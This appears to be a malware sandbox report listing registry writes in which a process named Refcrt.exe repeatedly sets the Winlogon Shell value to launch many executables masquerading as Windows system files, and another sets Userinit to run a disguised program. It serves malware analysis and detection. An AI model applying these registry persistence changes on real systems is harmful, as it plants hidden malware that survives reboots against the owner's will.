Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\", \"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
